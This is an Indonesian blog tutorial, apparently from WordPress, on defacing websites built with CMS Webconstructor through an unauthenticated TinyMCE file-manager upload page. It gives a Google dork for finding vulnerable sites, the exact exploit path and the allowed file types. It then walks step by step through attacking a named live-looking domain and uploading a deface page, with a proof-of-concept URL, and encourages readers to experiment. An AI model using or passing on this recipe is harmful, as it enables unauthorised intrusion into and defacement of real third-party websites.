Ketemu lagi dengan saya, jangan bosen yah🙂 Oke kita lanjut lagi dengan tutorial deface. Kali ini target kita adalah web dengan CMS Webconstructor yang memiliki celah untuk upload file. Seperti biasa celah upload file ini bisa kita gunakan untuk upload file deface kita😀

Dork : intext:CMS: webconstructor.pl
Exploit : http://%5Blocalhost%5D/PATH/tiny_mce/plugins/filemanager/InsertFile/insert_file.php
Allow File : html ,pdf ,ppt ,txt ,doc ,jpg

Oke setelah mengetahui 3 hal di atas kita bisa lanjut deh tutorialnya🙂

  1. Pertama kita cari dulu target kita dengan dork diatas
  2. Pilih salah satu target contoh: http://rofel.pl
  3. Kemudian coba kita exploit dengan menambahkan /tiny_mce/plugins/filemanager/InsertFile/insert_file.php setelah http://rofel.pl
  4. Maka url akan berubah menjadi http://rofel.pl/tiny_mce/plugins/filemanager/InsertFile/insert_file.php
  5. Kemudian kita cek apakah keluar halaman file manager atau tidak, jika tidak ya cari target lain😀
  6. Kalo berhasil akan muncul tampilan seperti inime
  7. Kalo udah gini ya tinggal kita upload aja file deface kita, POC : http://rofel.pl/upload/index.html

Oke deh sekian dulu tutorial deface kali ini, selamat bereksperimen. Ingat!! Dork bisa kita modif sendiri🙂
sumber

Comments
  1. MR.WWW says:

    Makasi ilmunya bang😀

Silakan Komentar Jika Kurang Jelas

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s